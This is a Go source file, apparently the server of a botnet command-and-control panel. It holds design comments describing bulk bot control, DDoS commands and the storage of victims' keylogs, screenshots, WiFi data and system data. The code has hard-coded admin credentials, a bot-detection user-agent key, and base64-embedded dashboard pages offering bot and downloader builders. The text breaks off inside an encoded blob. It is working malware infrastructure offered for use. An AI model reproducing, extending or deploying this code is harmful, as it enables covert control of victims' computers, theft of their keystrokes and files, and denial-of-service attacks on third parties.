//Must work Cross-Platform
//Basic Command and Control, for commanding bulk bots
//Bot Information will be stored in DB
//Bot Files, Screenshots, Keylogs, Ect... With be stored on file in folders
//Commands will be stored in DB
//Bot Folders/Files will be able to be accsessed via HTML dash with Auth

//SQL Based Account System
//Hard-Coded Account

//Encode Data = Text -> Base64 -> Obfuscate
//Decode Data = Deobfuscate -> Base64 -> Text

//Bot will use a get command with its GUID to tell the C&C that its done the command, for confirmation.

//Control Panel (PANEL) will show 10 bots at most before paging it
//Control Panel will have seprate controls for DDoS and normal commands

// Mutli Command ex. 0d6d83ae-e2b6-4ce9-b774-5714acbfbdbb,528cd466-1edb-405b-9d81-4aa41f0c6abb,a2e686d1-4003-4515-9035-e85bbc821a16|0x1|www.google.com|1

//Panel used http://purecss.io/ for CSS

// 0 = GUID
// 1 = IP
// 2 = WhoAmI
// 3 = OS
// 4 = Install Date and Time
// 5 = Has Admin Rights
// 6 = Anti-Virus Name
// 7 = CPU Name
// 8 = GPU Name
// 9 = System Information
// 10 = WiFi Information
// 11 = IPConfig Information
// 12 = Installed Software
// 13 = First Screenshot
// ...
package main

import (
	"bufio"
	"database/sql"
	"fmt"
	"io"
	"io/ioutil"
	"math/rand"
	"net/http"
	"os"
	"path"
	"path/filepath"
	"strconv"
	"strings"
	"time"

	_ "github.com/go-sql-driver/mysql"
	"github.com/gorilla/mux"
)

var (
	ControlUser string = "root"                             //Hard Coded Username
	ControlPass string = "7b24afc8bc80e548d66c4e7ff72171c5" //Hard Coded Password (MD5: toor)

	useSSL       bool   = true                               //Use SSL?
	myIP         string = "127.0.0.1"                        //IP to run Server on
	myPort       string = "7777"                             //Port to run Server on, Ignored if running SSL
	userAgentKey string = "d5900619da0c8a72e569e88027cd9490" // UserAgent for detecting bots

	mySQLUser string = "root"                //SQL Database Username
	mySQLPass string = ""                    //SQL Database Password
	mySQLHost string = "tcp(127.0.0.1:3306)" //SQL Database Host
	mySQLName string = "panel"               //SQL Database name

	db         *sql.DB
	err        error
	isPanel    bool   = true
	isNew      bool   = true
	isEnabled  bool   = true
	maxBotList int    = 2
	baseDir    string = "./Profiles"

	banner string = base64Decode(`IyMjIyMjIyMjIyMjIyMjIyMjIyMjI35+Li4nfC4jIyMjIyMjIyMjIyMjIy58YC4ufn4jIyMjIyMjIyMjIyMjIyMjIyMjIyMjIwojIyMjIyMjIyMjIyMjI34uL2Aufn4uLycgLi8gIyMjIyMjIyMjIyMjIyMjIyBcLiBgXC4gfn4uYFwufiMjIyMjIyMjIyMjIyMjCiMjIyMjIyMjIyMjI34uJyBgLmAtJyAgIC8gICB+IyMjIyMjIyMjIyMjI34gLiAgXCAgIGAtJy4nICBgLn4jIyMjIyMjIyMjIyMKIyMjIyMjIyMjI34uJyAgICB8ICAgICB8ICAuJ1wgfiMjIyMjIyMjIyN+IC9gLiAgfCAgICAgfCAgICAgYC5+IyMjIyMjIyMjIwojIyMjIyMjI34uJyAgICAgIHwgICAgIHwgIHxgLmAuXyB+IyMjI34gXy4nLid8ICB8ICAgICB8ICAgICAgIGAufiMjIyMjIyMjCiMjIyMjI34uJyAgICAgICAgYC4gICAgfCAgYC4uYC5ffFwuLS0uL3xfLicuLicgIHwgICAgLicgICAgICAgICBgLn4jIyMjIyMKIyMjI34uJyAgICAgICAgICAgIFwgICB8ICMuYC5gLl9gLictLWAuJ18uJy4nLiMgfCAgIC8gICAgICAgICAgICAgYC5+IyMjIwojI34uJyAgICAgICAuLi4uLi4gIFwgIHwgIyMjLmB+JyhvXHx8L28pYH4nLiMjIyB8ICAvICAuLi4uLi4gICAgICAgIGAufiMjCn4uYC4uLi4uLi4nfiAgICAgIGAuIFwgIFx+IyMjIyAgfFxfICBfL3wgICMjIyN+LyAgLyAuJyAgICAgIH5gLi4uLi4uLi4nLn4KOy4nICAgICAgICAgICAgICAgICBcIC4tLS0tLl9fLidgKG58fG4pJ2AuX18uLS0tLS4gLyAgICAgICAgICAgICAgICAgIGA7IApgLiAgICAgICAgICAgICAgICAgIC4nICAgIC4nICAgYC4gXGAnLyAuJyAgIGAuICAgIGAuICAgICAgICAgICAgICAgICAgLicgCiM6ICAgICAgICAgICAgICAgLi4nOiAgICAgIDogICAgJy4gfn4gLmAgICAgOiAgICAgIDpgLi4gICAgICAgICAgICAgICA6IyAKIzogICAgICAgICAgICAgLicgICA6ICAgICAuJyAgICAgLicgIGAuICAgICBgLiAgICAgOiAgIGAuICAgICAgICAgICAgIDojIAojOiAgICAgICAgICAgLicgICAgLmAgICAuJyAgICAgICAuIHx8IC4gICAgICAgYC4gICAnLiAgICBgLiAgICAgICAgICAgOiMgCiM6ICAgICAgICAgLicgICAgLicgOiAgICAgICAuLi4uJyAgICAgIGAuLi4uICAgICAgIDogYC4gICAgYC4gICAgICAgICA6IyAKIzogICAgICAgLicgICAgLicgKSApICAgICAgICAoICAgICAgKSAgICAgKCAgICAgICggICAgKWAuICAgIGAuICAgICAgIDojIAojOiAgICAgLi4nICAgIC4gICggKCggICApICApICkpICggICgoICAoICApKSAgKSAgKSkgICgoICBgLiAgIGAuLiAgICAgOiMgCiM6ICAuLicgICAgICAuJyMgKSApICkgKCggKCAoICggICkgKSApICkpKCAoICgoICggKCAgKSApICNgLiAgICAgYC4uICA6IyAKIzsuJyAgICAgICAgLicjI3woKCAgKCApICkgKSApICkoICggICgoICggKSApKSApICkgKSggKHx8IyNgLiAgICAgICBgLjojIAojYC4gICAgICAgIC4nIyMjfFxfXyAgKSggKCggKCAoICkgICkgICkpICkgICggICgoICggKV8pL3wjIyNgLiAgICAgICAuJyMgCiMjLmAgICAgICAgJyMjIyMjXF9ffn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+X18vIyMjIyNgICAgICAgJy4jIyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiMjIyAgICAgICAgIyMjIyMjIyAgfn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+ICAjIyMjIyMjICAgICAgICMjIyA=`)

	loginHTML string = base64Decode(`PCFkb2N0eXBlIGh0bWw+CjxodG1sPgo8aGVhZD4KICAgIDxtZXRhIGNoYXJzZXQ9InV0Zi04Ij4KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4KCiAgICA8dGl0bGU+TG9naW4gUG9ydGFsPC90aXRsZT4KCiAgICA8bGluayByZWw9InN0eWxlc2hlZXQiIGhyZWY9Imh0dHA6Ly95dWkueWFob29hcGlzLmNvbS9wdXJlLzAuNi4wL3B1cmUtbWluLmNzcyI+CgkKPHN0eWxlPgpib2R5IHsKICBiYWNrZ3JvdW5kOiAjNzZiODUyOyAvKiBmYWxsYmFjayBmb3Igb2xkIGJyb3dzZXJzICovCiAgYmFja2dyb3VuZDogLXdlYmtpdC1saW5lYXItZ3JhZGllbnQocmlnaHQsICM3NmI4NTIsICM4REMyNkYpOwogIGJhY2tncm91bmQ6IC1tb3otbGluZWFyLWdyYWRpZW50KHJpZ2h0LCAjNzZiODUyLCAjOERDMjZGKTsKICBiYWNrZ3JvdW5kOiAtby1saW5lYXItZ3JhZGllbnQocmlnaHQsICM3NmI4NTIsICM4REMyNkYpOwogIGJhY2tncm91bmQ6IGxpbmVhci1ncmFkaWVudCh0byBsZWZ0LCAjNzZiODUyLCAjOERDMjZGKTsKICAtd2Via2l0LWZvbnQtc21vb3RoaW5nOiBhbnRpYWxpYXNlZDsKICAtbW96LW9zeC1mb250LXNtb290aGluZzogZ3JheXNjYWxlOyAgICAgIAp9CiAgICAgICAgLmJ1dHRvbi1zdWNjZXNzLAogICAgICAgIC5idXR0b24tZXJyb3IsCiAgICAgICAgLmJ1dHRvbi13YXJuaW5nLAogICAgICAgIC5idXR0b24tc2Vjb25kYXJ5IHsKICAgICAgICAgICAgY29sb3I6IHdoaXRlOwogICAgICAgICAgICBib3JkZXItcmFkaXVzOiA0cHg7CiAgICAgICAgICAgIHRleHQtc2hhZG93OiAwIDFweCAxcHggcmdiYSgwLCAwLCAwLCAwLjIpOwogICAgICAgIH0KICAgICAgICAuYnV0dG9uLXN1Y2Nlc3MgewogICAgICAgICAgICBiYWNrZ3JvdW5kOiByZ2IoMjgsIDE4NCwgNjUpOyAvKiB0aGlzIGlzIGEgZ3JlZW4gKi8KICAgICAgICB9CiAgICAgICAgLmJ1dHRvbi1lcnJvciB7CiAgICAgICAgICAgIGJhY2tncm91bmQ6IHJnYigyMDIsIDYwLCA2MCk7IC8qIHRoaXMgaXMgYSBtYXJvb24gKi8KICAgICAgICB9CiAgICAgICAgLmJ1dHRvbi13YXJuaW5nIHsKICAgICAgICAgICAgYmFja2dyb3VuZDogcmdiKDIyMywgMTE3LCAyMCk7IC8qIHRoaXMgaXMgYW4gb3JhbmdlICovCiAgICAgICAgfQogICAgICAgIC5idXR0b24tc2Vjb25kYXJ5IHsKICAgICAgICAgICAgYmFja2dyb3VuZDogcmdiKDY2LCAxODQsIDIyMSk7IC8qIHRoaXMgaXMgYSBsaWdodCBibHVlICovCiAgICAgICAgfQo8L3N0eWxlPgo8L2hlYWQ+Cgo8Ym9keT4KCjxkaXYgY2xhc3M9InB1cmUtbWVudSBwdXJlLW1lbnUtaG9yaXpvbnRhbCIgYWxpZ249ImNlbnRlciI+CiAgICA8dWwgY2xhc3M9InB1cmUtbWVudS1saXN0Ij4KICAgICAgICA8c3BhbiBjbGFzcz0icHVyZS1tZW51LWhlYWRpbmciIGFsaWduPSJsZWZ0Ij5QbGVhc2UgTG9naW48L3NwYW4+CiAgICAgICAgPC9saT4KICAgIDwvdWw+CjwvZGl2Pgo8ZGl2IGFsaWduPSJjZW50ZXIiPgoJPGZvcm0gY2xhc3M9InB1cmUtZm9ybSIgbWV0aG9kPSJQT1NUIiBhY3Rpb249Ii9sb2dpbiI+CiAgICA8ZmllbGRzZXQgY2xhc3M9InB1cmUtZ3JvdXAiPgogICAgICAgIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJ1c2VybmFtZSIgY2xhc3M9InB1cmUtaW5wdXQtMS0yIiBwbGFjZWhvbGRlcj0iVXNlcm5hbWUiPgogICAgICAgIDxpbnB1dCB0eXBlPSJwYXNzd29yZCIgbmFtZT0icGFzc3dvcmQiIGNsYXNzPSJwdXJlLWlucHV0LTEtMiIgcGxhY2Vob2xkZXI9IlBhc3N3b3JkIj4KICAgIDwvZmllbGRzZXQ+CiAgICA8YnV0dG9uIHR5cGU9InN1Ym1pdCIgY2xhc3M9InB1cmUtYnV0dG9uIHB1cmUtaW5wdXQtMS0yIHB1cmUtYnV0dG9uLXByaW1hcnkiPlNpZ24gaW48L2J1dHRvbj4KPC9mb3JtPgo8L2Rpdj4KPC9ib2R5Pgo8L2h0bWw+`)

	filebrowseHTML string = base64Decode(`PCFkb2N0eXBlIGh0bWw+CjxodG1sPgo8aGVhZD4KICAgIDxtZXRhIGNoYXJzZXQ9InV0Zi04Ij4KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4KCiAgICA8dGl0bGU+Qm90bmV0IEMmQzogRmlsZSBCcm93c2VyPC90aXRsZT4KCiAgICA8bGluayByZWw9InN0eWxlc2hlZXQiIGhyZWY9Imh0dHA6Ly95dWkueWFob29hcGlzLmNvbS9wdXJlLzAuNi4wL3B1cmUtbWluLmNzcyI+CgkKCTxzdHlsZT4KYm9keSB7CiAgYmFja2dyb3VuZDogIzc2Yjg1MjsgLyogZmFsbGJhY2sgZm9yIG9sZCBicm93c2VycyAqLwogIGJhY2tncm91bmQ6IC13ZWJraXQtbGluZWFyLWdyYWRpZW50KHJpZ2h0LCAjNzZiODUyLCAjOERDMjZGKTsKICBiYWNrZ3JvdW5kOiAtbW96LWxpbmVhci1ncmFkaWVudChyaWdodCwgIzc2Yjg1MiwgIzhEQzI2Rik7CiAgYmFja2dyb3VuZDogLW8tbGluZWFyLWdyYWRpZW50KHJpZ2h0LCAjNzZiODUyLCAjOERDMjZGKTsKICBiYWNrZ3JvdW5kOiBsaW5lYXItZ3JhZGllbnQodG8gbGVmdCwgIzc2Yjg1MiwgIzhEQzI2Rik7CiAgLXdlYmtpdC1mb250LXNtb290aGluZzogYW50aWFsaWFzZWQ7CiAgLW1vei1vc3gtZm9udC1zbW9vdGhpbmc6IGdyYXlzY2FsZTsgICAgICAKfQogICAgICAgIC5idXR0b24tc3VjY2VzcywKICAgICAgICAuYnV0dG9uLWVycm9yLAogICAgICAgIC5idXR0b24td2FybmluZywKICAgICAgICAuYnV0dG9uLXNlY29uZGFyeSB7CiAgICAgICAgICAgIGNvbG9yOiB3aGl0ZTsKICAgICAgICAgICAgYm9yZGVyLXJhZGl1czogNHB4OwogICAgICAgICAgICB0ZXh0LXNoYWRvdzogMCAxcHggMXB4IHJnYmEoMCwgMCwgMCwgMC4yKTsKICAgICAgICB9CiAgICAgICAgLmJ1dHRvbi1zdWNjZXNzIHsKICAgICAgICAgICAgYmFja2dyb3VuZDogcmdiKDI4LCAxODQsIDY1KTsgLyogdGhpcyBpcyBhIGdyZWVuICovCiAgICAgICAgfQogICAgICAgIC5idXR0b24tZXJyb3IgewogICAgICAgICAgICBiYWNrZ3JvdW5kOiByZ2IoMjAyLCA2MCwgNjApOyAvKiB0aGlzIGlzIGEgbWFyb29uICovCiAgICAgICAgfQogICAgICAgIC5idXR0b24td2FybmluZyB7CiAgICAgICAgICAgIGJhY2tncm91bmQ6IHJnYigyMjMsIDExNywgMjApOyAvKiB0aGlzIGlzIGFuIG9yYW5nZSAqLwogICAgICAgIH0KICAgICAgICAuYnV0dG9uLXNlY29uZGFyeSB7CiAgICAgICAgICAgIGJhY2tncm91bmQ6IHJnYig2NiwgMTg0LCAyMjEpOyAvKiB0aGlzIGlzIGEgbGlnaHQgYmx1ZSAqLwogICAgICAgIH0KCQkgICogeyBtYXJnaW46IDA7IHBhZGRpbmc6IDA7IH0KCSAgIHAgeyBwYWRkaW5nOiAxMHB4OyB9CgkgICAjbGVmdCB7IHBvc2l0aW9uOiBhYnNvbHV0ZTsgbGVmdDogMDsgIHdpZHRoOiA1MCU7IH0KCSAgICNyaWdodCB7IHBvc2l0aW9uOiBhYnNvbHV0ZTsgcmlnaHQ6IDA7ICB3aWR0aDogNTAlOyB9Cjwvc3R5bGU+CjwvaGVhZD4KCjxib2R5Pgo8ZGl2IGNsYXNzPSJwdXJlLW1lbnUgcHVyZS1tZW51LWhvcml6b250YWwiIGFsaWduPSJjZW50ZXIiPgogICAgPHVsIGNsYXNzPSJwdXJlLW1lbnUtbGlzdCI+Cgk8c3BhbiBjbGFzcz0icHVyZS1tZW51LWhlYWRpbmciIGFsaWduPSJsZWZ0Ij5Cb3RuZXQgQyZDPC9zcGFuPgogICAgICAgIDxsaSBjbGFzcz0icHVyZS1tZW51LWl0ZW0gcHVyZS1tZW51LXNlbGVjdGVkIj48YSBocmVmPSJ7SE9TVH0vcGFuZWwiIGNsYXNzPSJwdXJlLW1lbnUtbGluayI+Q29udHJvbCBQYW5lbDwvYT48L2xpPgoJCTxsaSBjbGFzcz0icHVyZS1tZW51LWl0ZW0gcHVyZS1tZW51LXNlbGVjdGVkIj48YSBocmVmPSJ7SE9TVH0vZmlsZXMiIGNsYXNzPSJwdXJlLW1lbnUtbGluayI+RmlsZSBCcm93c2VyPC9hPjwvbGk+CgkJPGxpIGNsYXNzPSJwdXJlLW1lbnUtaXRlbSBwdXJlLW1lbnUtc2VsZWN0ZWQiPjxhIGhyZWY9IntIT1NUfS90YXNrbWdyIiBjbGFzcz0icHVyZS1tZW51LWxpbmsiPlRhc2sgTWFuYWdtZW50PC9hPjwvbGk+CgkJPGxpIGNsYXNzPSJwdXJlLW1lbnUtaXRlbSBwdXJlLW1lbnUtc2VsZWN0ZWQiPjxhIGhyZWY9IntIT1NUfS9zeXNsb2dzIiBjbGFzcz0icHVyZS1tZW51LWxpbmsiPkMmQyBMb2dzPC9hPjwvbGk+CgkJPGxpIGNsYXNzPSJwdXJlLW1lbnUtaXRlbSBwdXJlLW1lbnUtaGFzLWNoaWxkcmVuIHB1cmUtbWVudS1hbGxvdy1ob3ZlciI+CiAgICAgICAgICAgIDxhICBpZD0ibWVudUxpbmsxIiBjbGFzcz0icHVyZS1tZW51LWxpbmsiPlRvb2xzPC9hPgogICAgICAgICAgICA8dWwgY2xhc3M9InB1cmUtbWVudS1jaGlsZHJlbiI+CiAgICAgICAgICAgICAgICA8bGkgY2xhc3M9InB1cmUtbWVudS1pdGVtIj48YSBocmVmPSJ7SE9TVH0vYnVpbGQiIGNsYXNzPSJwdXJlLW1lbnUtbGluayI+Qm90IEJ1aWxkZXI8L2E+PC9saT4KICAgICAgICAgICAgICAgIDxsaSBjbGFzcz0icHVyZS1tZW51LWl0ZW0iPjxhIGhyZWY9IntIT1NUfS9kYnVpbGQiIGNsYXNzPSJwdXJlLW1lbnUtbGluayI+RG93bmxvYWRlciBCdWlsZGVyPC9hPjwvbGk+CiAgICAgICAgICAgICAgICA8bGkgY2xhc3M9InB1cmUtbWVudS1pdGVtIj48YSBocmVmPSJ7SE9TVH0vdG9vbHMiIGNsYXNzPSJwdXJlLW1lbnUtbGluayI+Q3J5cHRvZ3JhcGh5IFRvb2xzPC9hPjwvbGk+CiAgICAgICAgICAgIDwvdWw+CiAgICAgICAgPC9saT4KCQk8bGkgY2xhc3M9InB1cmUtbWVudS1pdGVtIHB1cmUtbWVudS1oYXMtY2hpbGRyZW4gcHVyZS1tZW51LWFsbG93LWhvdmVyIj4KICAgICAgICAgICAgPGEgaWQ9Im1lbnVMaW5rMSIgY2xhc3M9InB1cmUtbWVudS1saW5rIj5Vc2VyIE1hbmFnbWVudDwvYT4KICAgICAgICAgICAgPHVsIGNsYXNzPSJwdXJlLW1lbnUtY2hpbGRyZW4iPgogICAgICAgICAgICAgICAgPGxpIGNsYXNzPSJwdXJlLW1lbnUtaXRlbSI+PGEgaHJlZj0ie0hPU1R9L2FjY291bnQiIGNsYXNzPSJwdXJlLW1lbnUtbGluayI+QWNjb3VudCBTZXR0aW5nczwvYT48L2xpPgogICAgICAgICAgICAgICAgPGxpIGNsYXNzPSJwdXJlLW1lbnUtaXRlbSI+PGEgaHJlZj0ie0hPU1R9L2xvZ291dCIgY2xhc3M9InB1cmUtbWVudS1saW5rIj5Mb2dvdXQ8L2E+PC9saT4KICAgICAgICAgICAgPC91bD4KICAgICAgICA8L2xpPgogICAgPC91bD4KPC9kaXY+Cjxicj4KPGJyPgo8ZGl2IGFsaWduPSJjZW50ZXIiPjxoMj5GaWxlIEJyb3dzZXI8L2gyPjwvZGl2Pgo8YnI+CntTVEFUU30KPGJyPgoJPGRpdiBhbGlnbj0iY2VudGVyIj4KCTx1bD4KCXtGSUxFU30KCTwvdWw+Cgk8L2Rpdj4KPC9ib2R5Pgo8L2h0bWw+`)

	infoHTML string = base64Decode(`PCFkb2N0eXBlIGh0bWw+CjxodG1sPgo8aGVhZD4KICAgIDxtZXRhIGNoYXJzZXQ9InV0Zi04Ij4KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4KCiAgICA8dGl0bGU+Qm90bmV0IEMmQzogSW5mb3JtYXRpb248L3RpdGxlPgoKICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJlZj0iaHR0cDovL3l1aS55YWhvb2FwaXMuY29tL3B1cmUvMC42LjAvcHVyZS1taW4uY3NzIj4KCTxzY3JpcHQgc3JjPSJodHRwczovL3VzZS5mb250YXdlc29tZS5jb20vZTNlNmEzOThkZi5qcyI+PC9zY3JpcHQ+CgkKCTxzdHlsZT4KYm9keSB7CiAgYmFja2dyb3VuZDogIzc2Yjg1MjsgLyogZmFsbGJhY2sgZm9yIG9sZCBicm93c2VycyAqLwogIGJhY2tncm91bmQ6IC13ZWJraXQtbGluZWFyLWdyYWRpZW50KHJpZ2h0LCAjNzZiODUyLCAjOERDMjZGKTsKICBiYWNrZ3JvdW5kOiAtbW96LWxpbmVhci1ncmFkaWVudChyaWdodCwgIzc2Yjg1MiwgIzhEQzI2Rik7CiAgYmFja2dyb3VuZDogLW8tbGluZWFyLWdyYWRpZW50KHJpZ2h0LCAjNzZiODUyLCAjOERDMjZGKTsKICBiYWNrZ3JvdW5kOiBsaW5lYXItZ3JhZGllbnQodG8gbGVmdCwgIzc2Yjg1MiwgIzhEQzI2Rik7CiAgLXdlYmtpdC1mb250LXNtb290aGluZzogYW50aWFsaWFzZWQ7CiAgLW1vei1vc3gtZm9udC1zbW9vdGhpbmc6IGdyYXlzY2FsZTsgICAgICAKfQogICAgICAgIC5idXR0b24tc3VjY2VzcywKICAgICAgICAuYnV0dG9uLWVycm9yLAogICAgICAgIC5idXR0b24td2FybmluZywKICAgICAgICAuYnV0dG9uLXNlY29uZGFyeSB7CiAgICAgICAgICAgIGNvbG9yOiB3aGl0ZTsKICAgICAgICAgICAgYm9yZGVyLXJhZGl1czogNHB4OwogICAgICAgICAgICB0ZXh0LXNoYWRvdzogMCAxcHggMXB4IHJnYmEoMCwgMCwgMCwgMC4yKTsKICAgICAgICB9CiAgICAgICAgLmJ1dHRvbi1zdWNjZXNzIHsKICAgICAgICAgICAgYmFja2dyb3VuZDogcmdiKDI4LCAxODQsIDY1KTsgLyogdGhpcyBpcyBhIGdyZWVuICovCiAgICAgICAgfQogICAgICAgIC5idXR0b24tZXJyb3IgewogICAgICAgICAgICBiYWNrZ3JvdW5kOiByZ2IoMjAyLCA2MCwgNjApOyAvKiB0aGlzIGlzIGEgbWFyb29uICovCiAgICAgICAgfQogICAgICAgIC5idXR0b24td2FybmluZyB7CiAgICAgICAgICAgIGJhY2tncm91bmQ6IHJnYigyMjMsIDExNywgMjApOyAvKiB0aGlzIGlzIGFuIG9yYW5nZSAqLwogICAgICAgIH0KICAgICAgICAuYnV0dG9uLXNlY29uZGFyeSB7CiAgICAgICAgICAgIGJhY2tncm91bmQ6IHJnYig2NiwgMTg0LCAyMjEpOyAvKiB0aGlzIGlzIGEgbGlnaHQgYmx1ZSAqLwogICAgICAgIH0KCQkgICogeyBtYXJnaW46IDA7IHBhZGRpbmc6IDA7IH0KCSAgIHAgeyBwYWRkaW5nOiAxMHB4OyB9CgkgICAjbGVmdCB7IHBvc2l0aW9uOiBhYnNvbHV0ZTsgbGVmdDogMDsgIHdpZHRoOiA1MCU7IH0KCSAgICNyaWdodCB7IHBvc2l0aW9uOiBhYnNvbHV0ZTsgcmlnaHQ6IDA7ICB3aWR0aDogNTAlOyB9Cjwvc3R5bGU+Cgo8L2hlYWQ+Cgo8Ym9keT4KPGRpdiBjbGFzcz0icHVyZS1tZW51IHB1cmUtbWVudS1ob3Jpem9udGFsIiBhbGlnbj0iY2VudGVyIj4KICAgIDx1bCBjbGFzcz0icHVyZS1tZW51LWxpc3QiPgoJPHNwYW4gY2xhc3M9InB1cmUtbWVudS1oZWFkaW5nIiBhbGlnbj0ibGVmdCI+Qm90bmV0IEMmQzwvc3Bhbj4KICAgICAgICA8bGkgY2xhc3M9InB1cmUtbWVudS1pdGVtIHB1cmUtbWVudS1zZWxlY3RlZCI+PGEgaHJlZj0iLi9wYW5lbCIgY2xhc3M9InB1cmUtbWVudS1saW5rIj5Db250cm9sIFBhbmVsPC9hPjwvbGk+CgkJPGxpIGNsYXNzPSJwdXJlLW1lbnUtaXRlbSBwdXJlLW1lbnUtc2VsZWN0ZWQiPjxhIGhyZWY9Ii4vZmlsZXMiIGNsYXNzPSJwdXJlLW1lbnUtbGluayI+RmlsZSBCcm93c2VyPC9hPjwvbGk+CgkJPGxpIGNsYXNzPSJwdXJlLW1lbnUtaXRlbSBwdXJlLW1lbnUtaGFzLWNoaWxkcmVuIHB1cmUtbWVudS1hbGxvdy1ob3ZlciI+CiAgICAgICAgICAgIDxhIGlkPSJtZW51TGluazEiIGNsYXNzPSJwdXJlLW1lbnUtbGluayI+VXNlciBNYW5hZ21lbnQ8L2E+CiAgICAgICAgICAgIDx1bCBjbGFzcz0icHVyZS1tZW51LWNoaWxkcmVuIj4KICAgICAgICAgICAgICAgIDxsaSBjbGFzcz0icHVyZS1tZW51LWl0ZW0iPjxhIGhyZWY9Ii4vbG9nb3V0IiBjbGFzcz0icHVyZS1tZW51LWxpbmsiPkxvZ291dDwvYT48L2xpPgogICAgICAgICAgICA8L3VsPgogICAgICAgIDwvbGk+CiAgICA8L3VsPgo8L2Rpdj4KPGJyPgo8YnI+CjxkaXYgYWxpZ249ImNlbnRlciI+PGgyPkJvdCBJbmZvcm1hdGlvbjwvaDI+PC9kaXY+Cjxicj4Ke1NUQVRTfQo8YnI+CjxkaXYgYWxpZ249ImNlbnRlciI+CjxpbWcgYWx0PSIiIHNyYz0iLi9maWxlcy97R1VJRH0vU2NyZWVuc2hvdHMvRGVmYXVsdC5wbmciIHN0eWxlPSJ3aWR0aDogNTAwcHg7IGhlaWdodDogMjgxcHg7IiAvPgo8YnI+CjxhPkxhc3QgQ2hlY2stSW46IHtMQVNEQVRFfSA8L2E+Cjxicj4KPGE+Q2xpZW50IFZlcnNpb246IHtWRVJTSU9OfSA8L2E+Cjxicj4KCTxhIGNsYXNzPSJidXR0b24td2FybmluZyBwdXJlLWJ1dHRvbiIgaHJlZj0iLi9wdXJnZT9ndWlkPXtHVUlEfSI+PGkgY2xhc3M9ImZhIGZhLXRpbWVzIGZhLWxnIj48L2k+ICBEZWxldGUgZnJvbSBEYXRhYmFzZTwvYT4KPGJyPgo8ZGl2IGlkPSJsZWZ0IiBhbGlnbj0iY2VudGVyIj4KPGZvcm0gY2xhc3M9InB1cmUtZm9ybSBwdXJlLWZvcm0tc3RhY2tlZCI+Cgk8bGFiZWwgZm9yPSIxIj5HVUlEPC9sYWJlbD4KICAgIDxpbnB1dCBuYW1lPSIxIiB0eXBlPSJ0ZXh0IiB2YWx1ZT0ie0dVSUR9IiByZWFkb25seT4KCTxsYWJlbCBmb3I9IjIiPklQIEFkZHJlc3M8L2xhYmVsPgogICAgPGlucHV0IG5hbWU9IjIiIHR5cGU9InRleHQiIHZhbHVlPSJ7SVB9IiByZWFkb25seT4KCTxsYWJlbCBmb3I9IjIiPldobyBhbSBJPC9sYWJlbD4KICAgIDxpbnB1dCBuYW1lPSIyIiB0eXBlPSJ0ZXh0IiB2YWx1ZT0ie1dIT0FNSX0iIHJlYWRvbmx5PgoJPGxhYmVsIGZvcj0iMiI+T3BlcmF0aW5nIFN5c3RlbTwvbGFiZWw+CiAgICA8aW5wdXQgbmFtZT0iMiIgdHlwZT0idGV4dCIgdmFsdWU9IntPU30iIHJlYWRvbmx5PgoJPGxhYmVsIGZvcj0iMiI+RGF0ZSBJbnN0YWxsZWQ8L2xhYmVsPgogICAgPGlucHV0IG5hbWU9IjIiIHR5cGU9InRleHQiIHZhbHVlPSJ7SU5TREFURX0iIHJlYWRvbmx5PgoJPGxhYmVsIGZvcj0iMiI+SGF2ZSBBZG1pbiBSaWdodHM/PC9sYWJlbD4KICAgIDxpbnB1dCBuYW1lPSIyIiB0eXBlPSJ0ZXh0IiB2YWx1ZT0ie0FETUlOfSIgcmVhZG9ubHk+Cgk8bGFiZWwgZm9yPSIyIj5BbnRpLVZpcnVzPC9sYWJlbD4KICAgIDxpbnB1dCBuYW1lPSIyIiB0eXBlPSJ0ZXh0IiB2YWx1ZT0ie0FWfSIgcmVhZG9ubHk+Cgk8bGFiZWwgZm9yPSIyIj5DUFUgSW5mb3JtYXRpb248L2xhYmVsPgogICAgPGlucHV0IG5hbWU9IjIiIHR5cGU9InRleHQiIHZhbHVlPSJ7Q1BVfSIgcmVhZG9ubHk+Cgk8bGFiZWwgZm9yPSIyIj5HUFUgSW5mb3JtYXRpb248L2xhYmVsPgogICAgPGlucHV0IG5hbWU9IjIiIHR5cGU9InRleHQiIHZhbHVlPSJ7R1BVfSIgcmVhZG9ubHk+Cgk8L2Rpdj4KCTxkaXYgaWQ9InJpZ2h0IiBhbGlnbj0iY2VudGVyIj4KCTxhIGhyZWY9Ii4vZmlsZXMve0dVSUR9L0ZpbGVzLyIgY2xhc3M9InB1cmUtbWVudS1saW5rIj5GaWxlcyBGb2xkZXI8L2E+Cgk8YSBocmVmPSIuL2ZpbGVzL3tHVUlEfS9LZXlsb2dzLyIgY2xhc3M9InB1cmUtbWVudS1saW5rIj5LZXlsb2dzIEZvbGRlcjwvYT4KCTxhIGhyZWY9Ii4vZmlsZXMve0dVSUR9L1NjcmVlbnNob3RzLyIgY2xhc3M9InB1cmUtbWVudS1saW5rIj5TY3JlZW5zaG90cyBGb2xkZXI8L2E+Cgk8YnI+Cgk8YSBocmVmPSIuL2ZpbGVzL3tHVUlEfS9GaWxlcy9JbnN0YWxsZWQgU29mdHdhcmUudHh0IiBjbGFzcz0icHVyZS1tZW51LWxpbmsiPkluc3RhbGxlZCBTb2Z0d2FyZTwvYT4KCTxhIGhyZWY9Ii4vZmlsZXMve0dVSUR9L0ZpbGVzL0lQIENvbmZpZy50eHQiIGNsYXNzPSJwdXJlLW1lbnUtbGluayI+SVAgQ29uZmlnPC9hPgoJPGEgaHJlZj0iLi9maWxlcy97R1VJRH0vRmlsZXMvU3lzdGVtIEluZm9ybWF0aW9uLnR4dCIgY2xhc3M9InB1cmUtbWVudS1saW5rIj5TeXN0ZW0gSW5mb3JtYXRpb248L2E+Cgk8YSBocmVmPSIuL2ZpbGVzL3tHVUlEfS9GaWxlcy9XaUZpIEluZm9ybWF0aW9uLnR4dC